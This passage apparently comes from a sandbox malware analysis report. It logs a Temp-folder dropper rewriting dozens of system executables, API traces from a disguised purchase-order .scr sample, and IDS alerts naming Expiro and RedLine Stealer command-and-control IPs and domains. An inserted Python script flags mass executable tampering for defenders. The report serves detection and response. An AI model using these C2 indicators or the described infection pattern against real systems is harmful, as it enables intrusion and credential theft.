                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\vds.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\alg.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\snmptrap.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Spectrum.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Locator.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                            Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
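The rows above record a dropper in the user's Temp directory (microsofts.exe), plus one svchost.exe instance, rewriting dozens of Windows and third-party executables under System32 and Program Files. That is the file-infector behaviour behind the "Infects executable files" and Expiro signatures in this report, and it is the pattern a host-based detection should key on: a writer in a user-writable location touching many protected PE files. The Python below is an added example by the editor, not Joe Sandbox code. It parses rows in this report's "System file written" format (the raw export runs the two columns together and appends the "Jump to behavior" link text; a " | " delimiter is accepted too), ignores an installer rewriting files inside its own product directory, and assigns a verdict per writer. The sample rows are a constructed excerpt drawn from this report plus one constructed benign control row; the verdict labels, the directory markers and the threshold of three are the example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed excerpt of "System file written" rows, drawn from this report.  The raw
# export runs the Source and evidence columns together and appends the "Jump to
# behavior" link text; a " | " delimiter between the columns is accepted as well.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior",
    # Constructed benign control row (not from the report): an uninstaller rewriting its own product.
    r"Source: C:\Program Files\7-Zip\Uninstall.exe | System file written: C:\Program Files\7-Zip\7zFM.exe",
]

ROW_RE = re.compile(
    r"^Source:\s*(?P<writer>.+?)\s*\|?\s*System file written:\s*(?P<target>.+?)"
    r"(?:\s*\|?\s*Jump to behavior)?\s*$"
)

PE_EXTENSIONS = (".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl")
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")
MASS_THRESHOLD = 3   # assumption: this many protected PEs rewritten by one writer counts as mass tampering


def parse_rows(rows):
    """Extract (writer, target) pairs; rows that are not file-write evidence are skipped."""
    events = []
    for row in rows:
        match = ROW_RE.match(row.strip())
        if match:
            events.append((match.group("writer"), match.group("target")))
    return events


def is_protected_pe(path):
    """PE file under Windows or Program Files, i.e. something only an installer should rewrite."""
    lowered = path.lower()
    return lowered.startswith(PROTECTED_ROOTS) and lowered.endswith(PE_EXTENSIONS)


def is_user_writable(path):
    """Writer lives somewhere an unprivileged user (or a dropper) can place files."""
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE_MARKERS)


def product_root(path):
    """Product directory under Program Files (e.g. 'c:\\program files\\7-zip'), or None elsewhere."""
    parts = path.lower().split("\\")
    if len(parts) >= 3 and parts[1].startswith("program files"):
        return "\\".join(parts[:3])
    return None


def triage(events, threshold=MASS_THRESHOLD):
    """Group protected-PE writes per writer and assign a verdict (labels are this example's, not the sandbox's).

    mass-tampering: writer in a user-writable location rewrote >= threshold protected PEs
    suspicious:     same kind of writer, below the threshold
    review:         a system or product binary rewriting executables outside its own product (possible injected host)
    """
    targets_by_writer = defaultdict(set)
    for writer, target in events:
        if not is_protected_pe(target):
            continue
        root = product_root(writer)
        if root is not None and root == product_root(target):
            continue   # an installer or updater touching its own product directory is expected
        targets_by_writer[writer].add(target)

    verdicts = {}
    for writer, targets in targets_by_writer.items():
        if is_user_writable(writer):
            verdicts[writer] = "mass-tampering" if len(targets) >= threshold else "suspicious"
        else:
            verdicts[writer] = "review"
    return verdicts, targets_by_writer


if __name__ == "__main__":
    verdicts, targets_by_writer = triage(parse_rows(SAMPLE_ROWS))
    for writer, verdict in verdicts.items():
        print(f"{verdict:15} {writer}")
        for target in sorted(targets_by_writer[writer]):
            print(f"    rewrote {target}")
```

The consequence for response is the part the verdict list cannot express: every target a flagged writer touched has been modified in place, so deleting the dropper does not clean the host. Check each listed path's Authenticode signature (Get-AuthenticodeSignature in PowerShell) and reinstall any product whose binaries no longer validate; the svchost.exe row is the reason to also treat the running svchost instance as an injected host rather than a trusted writer.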
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose | 0_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0045DD7C FindFirstFileW,FindClose | 0_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 0_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle | 0_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0044BF8D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose | 3_2_00452126
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0045C999 FindFirstFileW,FindNextFileW,FindClose | 3_2_0045C999
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose | 3_2_00436ADE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 3_2_00434BEE
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0045DD7C FindFirstFileW,FindClose | 3_2_0045DD7C
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 3_2_0044BD29
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle | 3_2_00436D2D
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 3_2_00442E1F
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 3_2_00475FE5
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | Code function: 3_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 3_2_0044BF8D
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\Cache\
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | File opened: C:\Documents and Settings\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then jmp 05B4FCE7h | 7_2_05B4F588
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 7_2_05B4B128
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then jmp 05B4A455h | 7_2_05B4A434
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 7_2_05B42478
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then jmp 05B4DE72h | 7_2_05B4DE5A
                            Source: C:\Users\user\AppData\Local\Temp\build.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 7_2_05B421A8
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Code function: 4x nop then jmp 01457394h | 8_2_01457188
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Code function: 4x nop then jmp 014578DCh | 8_2_01457688
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 8_2_01457E60
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Code function: 4x nop then jmp 014578DCh | 8_2_0145767A
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 8_2_01457E54

                            Networking

                            Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63907 -> 1.1.1.1:53
                            Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 18.141.10.107:80
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49724
                            Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:63299 -> 1.1.1.1:53
                            Source: Network traffic | Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49724
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49713
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49711
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49711
                            Source: Network traffic | Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49706 -> 212.162.149.53:2049
                            Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:54745 -> 1.1.1.1:53
                            Source: Network traffic | Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:2049 -> 192.168.2.5:49706
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49713
                            Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:64943 -> 1.1.1.1:53
                            Source: Network traffic | Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:2049 -> 192.168.2.5:49706
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:49929
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:49929
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:49942
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:49942
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:49992
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:49992
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:49985
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:49985
                            Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50022 -> 34.211.97.45:80
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50022
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50022
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.213.104.86:80 -> 192.168.2.5:51583
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.213.104.86:80 -> 192.168.2.5:51583
                            Source: Network traffic | Suricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.5:53567 -> 1.1.1.1:53
                            Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50017
                            Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50017
